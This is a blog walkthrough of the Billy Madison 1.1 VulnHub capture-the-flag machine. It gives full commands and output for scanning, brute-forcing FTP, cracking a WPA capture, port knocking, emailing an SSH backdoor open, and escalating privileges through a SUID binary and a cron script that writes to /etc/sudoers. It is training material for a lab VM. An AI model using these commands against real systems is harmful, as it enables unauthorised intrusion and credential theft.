» Billy Madison 1.1 recap/walktrough

I was feeling like dusting off my 1337h4x sk1llz. Cause I quit my job I haven’t been actively tinkering with computers anymore and my hands were itching for a challenge. So I hopped on the Interwebs in search of some CTF action and came across the gem: https://www.vulnhub.com/entry/billy-madison-11,161/

Name: Billy Madison: 1.1
Date release: 14 Sep 2016
Author: Brian Johnson
Series: Billy Madison
Web page: https://7ms.us/billymadison/

It was a bit tricky to get through for me and my crappy linux skills. I did not want to use walkthroughs unless absolutely necessary, but thanks to Google, Github and whatnot and a couple of helpful tips from Brian @7MinSec I got through it alright.
Oh, and I wrote a tool for lulz to encrypt, decrypt or brute-force ROT-ciphers in Python which I’ll maybe post later on (once I’m happy with how it works overall)
Anywho, back to the VM. Let’s get cracking!
Side-note: The VM was hosted on ESX 6 and this was all pwned using Kali 2016.2

Plot: Help Billy Madison stop Eric from taking over Madison Hotels!

Sneaky Eric Gordon has installed malware on Billy’s computer right before the two of them are set to face off in an academic decathlon. Unless Billy can regain control of his machine and decrypt his 12th grade final project, he will not graduate from high school. Plus, it means Eric wins, and he takes over as head of Madison Hotels!

Objective: The primary objective of the VM is to figure out how Eric took over the machine and then undo his changes so you can recover Billy’s 12th grade final project. You will probably need to root the box to complete this objective.


So it begins!
Who dis?
# Telnet
# WordPress
# Apache
# Samba! Samba de Server Message Block!
Fire up the Hydra!
Flaming bag of Aircrack-ng
Last stop on the list: SMTP
The (back)gates are open
Time to PWN!!1!
Cleaning up for Billy


So it begins!

Ok, the VM presents me with a login screen! Good, it boots:

Ubuntu 16.04.1 LTS BM tty1
BM Login:


Who dis? Info gathering.

Let’s go for some broad-spectrum intel gathering.

nmap -p 1-65535 -T4 -A -v -Pn
Starting Nmap 7.00 ( https://nmap.org ) at 2016-09-26 20:49 W. Europe Daylight Time
NSE: Loaded 132 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating NSE at 20:49
Completed NSE at 20:49, 0.00s elapsed
Initiating ARP Ping Scan at 20:49
Scanning [1 port]
Completed ARP Ping Scan at 20:49, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:49
Completed Parallel DNS resolution of 1 host. at 20:49, 0.00s elapsed
Initiating SYN Stealth Scan at 20:49
Scanning BM.fritz.box ( [65535 ports]
Discovered open port 23/tcp on
Discovered open port 22/tcp on
Discovered open port 139/tcp on
Discovered open port 80/tcp on
Discovered open port 445/tcp on
SYN Stealth Scan Timing: About 23.25% done; ETC: 20:51 (0:01:42 remaining)
SYN Stealth Scan Timing: About 59.15% done; ETC: 20:51 (0:00:42 remaining)
Discovered open port 2525/tcp on
Discovered open port 69/tcp on
Completed SYN Stealth Scan at 20:50, 88.47s elapsed (65535 total ports)
Initiating Service scan at 20:50
Scanning 7 services on BM.fritz.box (
Completed Service scan at 20:51, 23.50s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against BM.fritz.box (
NSE: Script scanning
Initiating NSE at 20:51
Completed NSE at 20:51, 40.04s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Nmap scan report for BM.fritz.box (
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
WARNING: RST from port 23 -- is this port really open?
Host is up (0.000027s latency).
Not shown: 65526 filtered ports
22/tcp   open   tcpwrapped
23/tcp   open   telnet?
69/tcp   open   http        BaseHTTPServer
|_http-generator: WordPress 1.0
| http-methods: 
|_  Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: MadisonHotelsWordpress
|_http-title: Welcome | Just another WordPress site
80/tcp   open   http        Apache httpd 2.4.18 ((Ubuntu))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Oh nooooooo!
137/tcp  closed netbios-ns
138/tcp  closed netbios-dgm
139/tcp  open   netbios-ssn Samba smbd 3.X (workgroup: BM)
445/tcp  open   netbios-ssn Samba smbd 3.X (workgroup: BM)
2525/tcp open   smtp
| smtp-commands: BM, 8BITMIME, AUTH LOGIN, Ok, 
|_ SubEthaSMTP null on BM Topics: HELP HELO RCPT MAIL DATA AUTH EHLO NOOP RSET VRFY QUIT STARTTLS For more info use "HELP ". End of HELP info 
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 00:0C:29:A5:98:2F (VMware)
Device type: general purpose
Running: OpenBSD 4.X
OS CPE: cpe:/o:openbsd:openbsd:4.4
OS details: OpenBSD 4.4
Network Distance: 1 hop

Host script results:
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.9-Ubuntu)
|   Computer name: bm
|   NetBIOS computer name: BM
|   Domain name: 
|   FQDN: bm
|_  System time: 2016-09-26T13:51:33-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smbv2-enabled: Server supports SMBv2 protocol

1   0.03 ms BM.fritz.box (

NSE: Script Post-scanning.
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Initiating NSE at 20:51
Completed NSE at 20:51, 0.00s elapsed
Read data files from: F:\Program Files (x86)\Nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.41 seconds
           Raw packets sent: 131162 (5.774MB) | Rcvd: 86 (3.656KB)

So we have Telnet, SSH, HTTP on 69 and 80, SMB, SMTP on 2525

# Telnet

ncat -v 23
Ncat: Version 7.25BETA2 ( https://nmap.org/ncat )
Ncat: Connected to

***** HAHAH! You're banned for a while, Billy Boy!  By the way, I caught you trying to hack my wifi - but the joke's on you! I don't use ROTten passwords like rkfpuzrahngvat anymore! Madison Hotels is as good as MINE!!!! *****

OH ERIC U FUNNY! But the ROT10 is a password and might lead further. So I find me a ROT tool online and stumble across a way to do it with ‘tr’

ROT-1 = tr 'b-za-aB-ZA-A' 'a-zA-Z'
ROT-2 = tr 'c-za-bC-ZA-B' 'a-zA-Z'
ROT-3 = tr 'd-za-cD-ZA-C' ‘a-zA-Z’

But I dunno what I’m looking for exactly so I want a wordlist with all possibilities. For now I have a list from the web, but this would be relatively easy to make and I was looking to do something useful in Python. And that’s how my c1ph3r.py tool was born.



ssh_exchange_identification: Connection refused by remote host

No dice. Probably something monitoring the port too.

# WordPress 1.0 on :69

Since the WP version is from the Dark Ages let’s see what we can find with running the WordPress Security Scanner against it and see what’s what.

wpscan --url
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 2.9.1
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_

The plugins directory 'wp-content/plugins' does not exist.
You can specify one per command line option (don't forget to include the wp-content directory if needed)
[?] Continue? [Y]es [N]o, default: [N]
[+] URL:
[+] Started: Sat Sep 10 22:56:29 2016

[!] The WordPress '' file exists exposing a version number
[+] Interesting header: SERVER: MadisonHotelsWordpress
[+] XML-RPC Interface available under:

[+] WordPress version 1.0 identified from meta generator (Released on 2004-01-03)

[+] WordPress theme in use: twentyeleven

[+] Name: twentyeleven
 |  Latest version: 2.5
 |  Location:
 |  Readme:
 |  Changelog:
 |  Style URL:
 |  Referenced style.css:

[+] Enumerating plugins from passive detection ...
[+] No plugins found

[+] Finished: Sat Sep 10 22:56:29 2016
[+] Requests Done: 59
[+] Memory used: 15.312 MB
[+] Elapsed time: 00:00:00

Nothing special. Enumerating the users via /?author=1 /?author=2 I can only find 1 account: admin. Noted. This smells funny though. Nothing from my ROT-list works here. Doesn’t really look promising so I’ll move on for now to webservice number 2


# Apache on :80

So visiting the webpage renders a funny defaced site. Silly Billy!!! Eric has no love for Billy.
“Good luck, schmuck.”
So I check the page and see nothing special in code or in the images. Let’s fuzz the site with the ROT10 list.

wfuzz -c -w /root/hacking/BM/ROT.wls --hc=404 
* Wfuzz 2.1.3 - The Web Bruteforcer                      *

Total requests: 26

ID	Response   Lines      Word         Chars          Request    

00015:  C=301      9 L	      28 W	    321 Ch	  "exschmenuating"

Total time: 0.110656
Processed Requests: 26
Filtered Requests: 25
Requests/sec.: 234.960

SHWEET! The site “exschmenuating” was found. Visiting renders a page with “Ruin Billy Madison’s Life” – Eric’s notes. And also a link to which lists my host as blocked.

Hosts currently banned
Chain INPUT (policy DROP)
DROP       all  --  anywhere       
If your IP appears in this list it has been banned, and you will need to reset this host to lift the ban. Otherwise, further efforts to connect to this host may produce false positives or refuse connections altogether.

Senpai has noticed me. No worries, I’ll change my ifconfig-ables once I go attack-mode.
Another interesting bit of info is the 08/03/16 entry:

OMg LOL LOL LOL!!! What a twit - I can't believe she fell for it!! I .captured the whole thing in this folder for later lulz. I put "veronica" somewhere in the file name because I bet you a million dollars she uses her name as part of her passwords - if that's true, she rocks! Anyway, malware installation successful. I'm now in complete control of Bill's machine!

Thank you, Eric – for putting a .cap file on here with Veronica’s name in there.
First – make a wordlist to use with dirbuster to find the .cap (maybe .pcap). As a source I’m gonna use one of the largest standard included wordlists in Kali: rockyou.txt.

grep veronica /usr/share/wordlist/rockyou.txt > veronica.wls

Next – I throw the thing into dirbuster (GUI) to look for a *veronica* named .cap or .pcap file, aaaaaand bingo: 012987veronica.cap found!
After downloading “012987veronica.cap” and filtering out the TCP streams in Wireshark you’ll find several e-mails detailing how Eric pwns Veronica through a little bit of ‘Social Engineering’.
The most important emails refer to a “Spanish Armada” combo and contain FTP credentials for Eric


Thanks for your message. I tried to download that file but my antivirus blocked it.

Could you just upload it directly to us via FTP?  We keep FTP turned off unless someone connects with the "Spanish Armada" combo.


EHLO kali
MAIL FROM:<eric@madisonhotels.com>
RCPT TO:<vvaughn@polyfector.edu>
Date: Sat, 20 Aug 2016 21:57:11 -0500
To: vvaughn@polyfector.edu
From: eric@madisonhotels.com
Subject: test Sat, 20 Aug 2016 21:57:11 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/


Thanks that will be perfect.  Please set me up an account with username of "eric" and password "ericdoesntdrinkhisownpee."



So Billys got a thing for numbers, huh? The youtube video references a sequence of years/numbers after the words Spanish Armada: 1466 67 1469 1514 1981 1986.
Eric clearly doesn’t have a thing for pee.
Last I checked no FTP port was open. Let’s check SMB first before I dig into FTP.

# Samba! Samba de Server Message Block! https://www.youtube.com/watch?v=Bx1iclqbNyM

Ah SMB. CIFS. Very familiar stuff – let’s check for shares.

smbmap -H
[+] Finding open SMB ports....
[+] Guest SMB session established on
[+] IP:	Name: BM.fritz.box                                      
	Disk                                                  	Permissions
	----                                                  	-----------
	EricsSecretStuff                                  	READ ONLY
	IPC$                                              	NO ACCESS

nmap told us a guest account was used to check so let’s connect anonymously.

smbclient -N //
WARNING: The "syslog" option is deprecated
Domain=[WORKGROUP] OS=[Windows 6.1] Server=[Samba 4.3.9-Ubuntu]
smb: \> ls
  .                                   D        0  Sat Sep 10 23:27:10 2016
  ..                                  D        0  Sat Aug 20 14:56:45 2016
  ._.DS_Store                        AH     4096  Wed Aug 17 10:32:07 2016
  ebd.txt                             N       35  Sat Sep 10 23:27:10 2016
  .DS_Store                          AH     6148  Wed Aug 17 10:32:12 2016

        30291996 blocks of size 1024. 25800892 blocks available
smb: \>

Noice. Get teh supplies. Drop teh supplies.

smb: \> mget *.* 
Get file ._.DS_Store? y
getting file \._.DS_Store of size 4096 as ._.DS_Store (1999.9 KiloBytes/sec) (average 475.8 KiloBytes/sec)
Get file ebd.txt? y
getting file \ebd.txt of size 35 as ebd.txt (17.1 KiloBytes/sec) (average 469.1 KiloBytes/sec)
Get file .DS_Store? y
getting file \.DS_Store of size 6148 as .DS_Store (3001.8 KiloBytes/sec) (average 505.5 KiloBytes/sec)
smb: \> exit<
root@kali:~/hacking/BM# cat ebd.txt
Erics backdoor is currently CLOSED

So there’s a monitored backdoor. With the sequence and all that sounds like a port knock to me.


Let’s try a port knocking sequence with the Spanish Armada numbers as ports.

for K in 1466 67 1469 1514 1981 1986; do nmap -Pn --max-retries 0 -p $K; done

After all packets are sent do a scan to see if the port is up.

nmap -Pn -p 21 -A
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2016-09-30 23:24 CEST
Nmap scan report for
Host is up (0.00046s latency).
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
|_ftp-bounce: bounce working!

Fantastic! Anonymous login is also allowed. So let’s start there.

Connected to
220 Welcome to ColoradoFTP - the open source FTP server (www.coldcore.com)
Name ( anonymous
331 Guest login okay, send your complete e-mail address as password.
230 User logged in, proceed.
Remote system type is UNIX.
ftp> ls
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 141 Aug 15 09:19 Billys-12th-grade-final-project.doc
226 Transfer completed.
ftp> get Billys-12th-grade-final-project.doc
local: Billys-12th-grade-final-project.doc remote: Billys-12th-grade-final-project.doc
200 PORT command successful.
150 Opening A mode data connection for Billys-12th-grade-final-project.doc.
226 Transfer completed for "Billys-12th-grade-final-project.doc".
145 bytes received in 0.25 secs (0.5690 kB/s)
ftp> quit
221 Logged out, closing control connection.
cat Billys-12th-grade-final-project.doc
out by the pool for another hour!


Let’s move on to Eric’s FTP. login with user “eric” and password “ericdoesntdrinkhisownpee”

ftp> ls -lah
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 6326 Aug 20 12:49 40049
-rwxrwxrwx 1 ftp 5367 Aug 20 12:49 39772
-rwxrwxrwx 1 ftp 868 Sep 01 10:42 .notes
-rwxrwxrwx 1 ftp 5208 Aug 20 12:49 39773
-rwxrwxrwx 1 ftp 1287 Aug 20 12:49 9129
-rwxrwxrwx 1 ftp 9132 Aug 20 12:49 40054
226 Transfer completed.

I mget all of these files and start digging.
First of all I check out the content of the .notes file.

cat .notes
Ugh, this is frustrating.  

I managed to make a system account for myself. I also managed to hide Billy's paper
where he'll never find it.  However, now I can't find it either :-(.
To make matters worse, my privesc exploits aren't working.  
One sort of worked, but I think I have it installed all backwards.

If I'm going to maintain total control of Billy's miserable life (or what's left of it)
I need to root the box and find that paper!

Fortunately, my SSH backdoor into the system IS working.  
All I need to do is send an email that includes
the text: "My kid will be a ________ _________"

Hint: https://www.youtube.com/watch?v=6u7RsW5SAgs

The new secret port will be open and then I can login from there with my wifi password, which I'm
sure Billy or Veronica know.  I didn't see it in Billy's FTP folders, but didn't have time to
check Veronica's.


The answer is soccer player. It’s clear we need to send him an e-mail with the body and header “My kid will be a soccer player” to open Eric’s SSH backdoor. We’ll get to SMTP soon enough. The other files provide background info on the exploit and how you can try and use it. But first I wanna hack all the things so I reckon there are accounts for Billy and Veronica. Let’s start with Veronica and let’s also assume her name is in the password.

Fire up the Hydra!

hydra -l veronica -P veronica.wls
Hydra v8.2 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2016-09-28 20:14:27
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] max 16 tasks per 1 server, overall 64 tasks, 773 login tries (l:1/p:773), ~0 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host:   login: veronica   password: babygirl_veronica07@yahoo.com
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-09-28 20:14:56

Yup, we were right. First we get cookies and chill because: easy h4x, easy life. Then we login with her creds.
The first time I logged in and pulled all her files the .cap file was corrupt. Asked myself: by design or else? I looked the the file with a Hex Editor. That didn’t help – but it did get me the ESSID: EricGordon. Turns out I had not thought to set the mode to BINARY!! Cheers, Brian \^^/

ftp> binary
200 Type set to I
ftp> ls -lah
200 PORT command successful.
150 Opening A mode data connection for /.
-rwxrwxrwx 1 ftp 719128 Aug 17 12:16 eg-01.cap
-rwxrwxrwx 1 ftp 595 Aug 20 12:55 email-from-billy.eml
226 Transfer completed.

I mget all of her files. Let start checking out the e-mail from Billy:

cat email-from-billy.eml
Sat, 20 Aug 2016 12:55:45 -0500 (CDT)
Date: Sat, 20 Aug 2016 12:55:40 -0500
To: vvaughn@polyfector.edu
From: billy@madisonhotels.com
Subject: test Sat, 20 Aug 2016 12:55:40 -0500
X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
Eric's wifi

Hey VV,

It's your boy Billy here.  Sorry to leave in the middle of the night but I wanted to crack Eric's wireless and then mess with him.
I wasn't completely successful yet, but at least I got a start.

I didn't walk away without doing my signature move, though.  I left a flaming bag of dog poo on his doorstep. :-)



I also started a hydra session for billy but with a big wordlist and the amount of tasks I was limited to, gave up in persuit of r00t.
Dirty Billy left a bag of flaming poo and captured eg-01.cap which contains EricGordon’s password. Good times all around. Let’s crack!


Flaming bag of Aircrack-ng

Using the same wordlist I put aircrack-ng to work on the .cap

aircrack-ng -a 2 -e EricGordon -w /usr/share/wordlists/rockyou.txt eg-01.capOpening eg-01.cap
Read 13003 packets.

Opening eg-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:05:09] 1699636/9822768 keys tested (5674.90 k/s) 

      Time left: 23 minutes, 51 seconds                         17.30%

                           KEY FOUND! [ triscuit* ]

      Master Key     : 9E 8B 4F E6 CC 5E E2 4C 46 84 D2 AF 59 4B 21 6D 
                       B5 3B 52 84 04 9D D8 D8 83 67 AF 43 DC 60 CE 92 

      Transient Key  : 7A FA 82 59 5A 9A 23 6E 8C FB 1D 4B 4D 47 BE 13 
                       D7 AC AC 4C 81 0F B5 A2 EE 2D 9F CC 8F 05 D2 82 
                       BF F4 4E AE 4E C9 ED EA 31 37 1E E7 29 10 13 92 
                       BB 87 8A AE 70 95 F8 62 20 B5 2B 53 8D 0C 5C DC 

      EAPOL HMAC     : 86 63 53 4B 77 52 82 0C 73 4A FA CA 19 79 05 33

So the login creds for the SSH:1974 backdoor will be user “eric” with password “triscuit*”

Last stop on the list: SMTP. The key

EHLO friend. We’re gonna make Eric send himself a mail with “My kid will be a soccer player” in the body and header to activate his SSH backdoor.
You can do this via telnet and punch in the commands yourself or use swaks

swaks -t eric@madisonhotels.com -f eric@madisonhotels.com -s --body "My kid will be a soccer player" --header "Subject: My kid will be a soccer player"
=== Trying
=== Connected to
 EHLO kali
 MAIL FROM:<eric@madisonhotels.com>
 RCPT TO:<eric@madisonhotels.com>
 -> Date: Sat, 01 Oct 2016 01:36:59 +0200
 -> To: eric@madisonhotels.com
 -> From: eric@madisonhotels.com
 -> Subject: My kid will be a soccer player
 -> X-Mailer: swaks v20130209.0 jetmore.org/john/code/swaks/
 -> My kid will be a soccer player
 -> .

So now the SSH backdoor should be open. Let’s do another scan.

1974/tcp open   ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 f2:02:a4:3b:8f:84:a2:fd:28:53:e5:2d:a2:63:90:48 (RSA)
|_  256 31:60:85:b5:93:da:92:9e:90:a2:d0:a7:c4:51:42:8e (ECDSA)

The (back)gates are open

Let’s see what Eric has been up to here – saving Madison Hotels from certain doom and retrieve Billy’s homework.

ssh -p 1974 eric@
eric@'s password:
Welcome to Ubuntu 16.04.1 LTS (GNU/Linux 4.4.0-36-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

37 packages can be updated.
0 updates are security updates.

Last login: Sat Aug 20 22:28:28 2016 from

Great success! Lets have a look at what Eric keeps in his home folder.

eric@BM:~$ ls -lah
total 532K
drwxr-xr-x 3 eric eric 4.0K Aug 23 00:18 .
drwxr-xr-x 6 root root 4.0K Aug 20 13:56 ..
-rw-r--r-- 1 eric eric  220 Aug 20 13:56 .bash_logout
-rw-r--r-- 1 eric eric 3.7K Aug 20 13:56 .bashrc
drwx------ 2 eric eric 4.0K Aug 20 14:07 .cache
-rw-r--r-- 1 root root 441K Aug  7 22:31 eric-tongue-animated.gif
-rw-r--r-- 1 root root  60K Aug  7 22:29 eric-unimpressed.jpg
-rw-r--r-- 1 eric eric  655 Aug 20 13:56 .profile
-rw-r--r-- 1 root root  115 Aug 20 20:41 why-1974.txt
eric@BM:~$ cat why-1974.txt
Why 1974?  Because: http://www.metacafe.com/watch/an-VB9KuJtnh4bn/billy_madison_1995_billy_hangs_out_with_friends/

We’ve got a reason for the portnumber and some pics. I quickly scp’ed them to storage elsewhere for safekeeping and documentation.


Time to PWN!!1!

The documentation and code Eric used for sploiting Billys machine references a vulnerabilty to mess with the reference count of the struct file and will allow us to write data to a read-only file. The exploit will create a writable file descriptor, start a write operation on it, wait for the kernel to verify the file’s writability, then free the writable file and open a read-only file that is allocated in the same place before the kernel writes into the freed file, allowing an attacker to possibly obtain r00t by writing a cron-job.
Ok, now – how do we look for this? After sleeping on it for a night and reading up on some things I settled on the logic that the eric must have gotten file owner’s permissions as well as owner UID and GID when executing the exploit. Now if this occurs in a folder he normally does not have those rights too they will be elevated with SUID permissions.
Let’s have a find.

eric@BM:~$ find / -user root -perm -4000 -ls 2>/dev/null
  1454477    368 -r-sr-s---   1 root     eric       372922 Aug 20 22:35 /usr/local/share/sgml/donpcgd
  1048829    136 -rwsr-xr-x   1 root     root       136808 May  4 12:25 /usr/bin/sudo
  1058216     24 -rwsr-xr-x   1 root     root        23376 Jan 17  2016 /usr/bin/pkexec
  1048745     56 -rwsr-xr-x   1 root     root        54256 Mar 29 04:25 /usr/bin/passwd
  1057557     36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newgidmap
  1048609     40 -rwsr-xr-x   1 root     root        40432 Mar 29 04:25 /usr/bin/chsh
  1048670     76 -rwsr-xr-x   1 root     root        75304 Mar 29 04:25 /usr/bin/gpasswd
  1057558     36 -rwsr-xr-x   1 root     root        32944 Mar 29 04:25 /usr/bin/newuidmap
  1048734     40 -rwsr-xr-x   1 root     root        39904 Mar 29 04:25 /usr/bin/newgrp
  1048607     52 -rwsr-xr-x   1 root     root        49584 Mar 29 04:25 /usr/bin/chfn
  1058246     24 -rwsr-xr-x   1 root     root        23288 Apr 29 11:02 /usr/bin/ubuntu-core-launcher
  1048930     12 -rwsr-xr-x   1 root     root        10240 Feb 25  2014 /usr/lib/eject/dmcrypt-get-device
  1057498     40 -rwsr-xr-x   1 root     root        38984 Jun 30 02:28 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  1318420     16 -rwsr-xr-x   1 root     root        14864 Jan 17  2016 /usr/lib/policykit-1/polkit-agent-helper-1
  1066069    420 -rwsr-xr-x   1 root     root       428240 Aug 11 11:25 /usr/lib/openssh/ssh-keysign
  1056767     44 -rwsr-xr--   1 root     messagebus    42992 Apr  1 11:41 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  1179709     40 -rwsr-xr-x   1 root     root          40152 May 26 18:31 /bin/mount
  1179740     40 -rwsr-xr-x   1 root     root          40128 Mar 29 04:25 /bin/su
  1179758     28 -rwsr-xr-x   1 root     root          27608 May 26 18:31 /bin/umount
  1190647     32 -rwsr-xr-x   1 root     root          30800 Mar 11  2016 /bin/fusermount
  1179724     44 -rwsr-xr-x   1 root     root          44680 May  7  2014 /bin/ping6
  1179723     44 -rwsr-xr-x   1 root     root          44168 May  7  2014 /bin/ping
  1190681    140 -rwsr-xr-x   1 root     root         142032 Feb 17  2016 /bin/ntfs-3g

Enemy spotted: /usr/local/share/sgml/donpcgd runs as root.

eric@BM:~$ /usr/local/share/sgml/donpcgd
Usage: /usr/local/share/sgml/donpcgd path1 path2

I want to make Eric a sudoer. First I try to manipulate crontab as is directly stated in the documentation, but I fail at that. So I pick cron.hourly and try an make an empty file there which I will put a script in to edit /etc/sudoers

eric@BM:/tmp$ touch elevate
eric@BM:/tmp$ /usr/local/share/sgml/donpcgd /tmp/elevate /etc/cron.hourly/pwn
#### mknod(/etc/cron.hourly/pwn,81b4,0)
eric@BM:/tmp$ echo -e '#!/bin/bash\necho "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /etc/cron.hourly/pwn
eric@BM:/tmp$ chmod +x /etc/cron.hourly/pwn
eric@BM:/tmp$ cat /etc/cron.hourly/pwn
echo "eric ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers

Now we wait a little. Play a game. Eat a cookie.

eric@BM:~$ sudo su
root@BM:/home/eric# id
uid=0(root) gid=0(root) groups=0(root)

B0w t0 me, f0r I am r00t!
In order to complete the VM we need to clean up Eric’s mess and find Billy’s paper. So I’m just gonna root through everything and see what pops up. First lets look around for interesting stuff.

root@BM:~# ls -lah
total 92K
drwx------  8 root root 4.0K Sep 15 11:02 .
drwxr-xr-x 25 root root 4.0K Aug 30 01:15 ..
-rw-------  1 root root   26 Sep 15 11:01 .bash_history
-rw-r--r--  1 root root 3.1K Oct 22  2015 .bashrc
drwx------  3 root root 4.0K Aug 11 22:30 .cache
drwxr-xr-x  2 root root 4.0K Aug 22 21:24 checkban
-rwxr-xr-x  1 root root  112 Aug 21 22:11 cleanup.sh
-rwxr-xr-x  1 root root   59 Aug 21 22:12 ebd.sh
-rw-r--r--  1 root root   35 Aug 21 16:51 ebd.txt
-rwxr-xr-x  1 root root  102 Aug 20 12:45 email.sh
-rwxr-xr-x  1 root root   63 Aug 19 17:26 ftp.sh
-rwxr-xr-x  1 root root 1020 Aug 20 14:00 fwconfig.sh
drwx------  2 root root 4.0K Aug 21 15:58 .gnupg
drwxr-xr-x  3 root root 4.0K Aug 12 22:53 .m2
drwxr-xr-x  2 root root 4.0K Aug 11 22:17 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 15 10:16 .selected_editor
drwxr-xr-x  2 root root 4.0K Aug 22 21:19 ssh
-rwxr-xr-x  1 root root   33 Aug 11 22:51 ssh.sh
-rwxr-xr-x  1 root root   69 Aug 15 20:54 startup.sh
-rwxr-xr-x  1 root root  122 Aug 17 22:55 telnet.sh
-rw-r--r--  1 root root  222 Aug 20 21:58 .wget-hsts
-rwxr-xr-x  1 root root  230 Aug 16 17:08 wp.sh

The shells here are partly legit and partly not and so it’s imperative to keep note of all the stuff Eric’s put in place.

Billy’s paper

In / we will find a folder called PRIVATE/

root@BM:/# ls -lah PRIVATE/
total 1.1M
drwx------  2 root  root  4.0K Aug 29 09:58 .
drwxr-xr-x 25 root  root  4.0K Aug 30 01:15 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   221 Aug 29 09:08 hint.txt

As is the case with almost anything I will find I take a copy locally to Kali and check the file.

file BowelMovement
BowelMovement: data

BowelMovement looks like promising but is not human-readable, executable or a plain archive.
Let’s check out hint.txt

cat PRIVATE/hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:



Yeah – OK. So we have a password-protected file. I’m taking a shot across the bow with it beign a password-protected Office .doc/.docx, but no luck there. Hex Editor is no good here. So maybe it’s an encrypted volume. I’m guessing VeraCrypt/TrueCrypt. First I need a wordlist (spider with CeWL), then I can brute-force (truecrack) the file.

cewl --depth 0 -w billywiki.wls https://en.wikipedia.org/wiki/Billy_Madison
CeWL 5.2 (Some Chaos) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

truecrack -w billywiki.wls -t BowelMovement
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password: "execrable"
Password length: "10"
Total computations: "604"

Now that I know it’s encryption is TrueCrypt have the password I mount the file with veracrypt

veracrypt -tc BowelMovement crypt
Enter password for /root/hacking/BM/loot/root/BowelMovement:
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:

        1     16 drwx------   3 root     root        16384 Dec 31  1969 .
       65      1 -rwx------   1 root     root         1000 Aug 21 10:22 ./secret.zip
       66      1 drwx------   2 root     root          512 Aug 21 10:39 ./$RECYCLE.BIN
       68      1 -rwx------   1 root     root          129 Aug 21 10:39 ./$RECYCLE.BIN/desktop.ini

After you’ve unpacked the zip-file you’ll find 2 documents. One of which is Billy’s paper! Congrats! And a note “THE-END.txt”

cat THE-END.txt

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security

And to top it off I will not have the internet go without this shining example of the intellectual prowess of Billy Madison.

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way."
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em.
Except that the puppy was a dog.
But the industry, my friends, that was a revolution.




Cleaning up for Billy!

The objective stated that you have to undo the changes to recover Billy’s project. Having taken the more direct approach and having r00t I’ll just go ahead and remove Eric’s mess from this machine and leave it in a better state than I found it in. I’ll state here that I backed up everything on separate storage in case anything needs to be analysed/recovered.

# Ernie knows it!
It might not constitute a change by Eric. But the system has been compromised so it’s best to just reset all the passwords. Plus this will allow me to physically access the system

echo -e "NEWPASS\nNEWPASS" | passwd USERNAME"

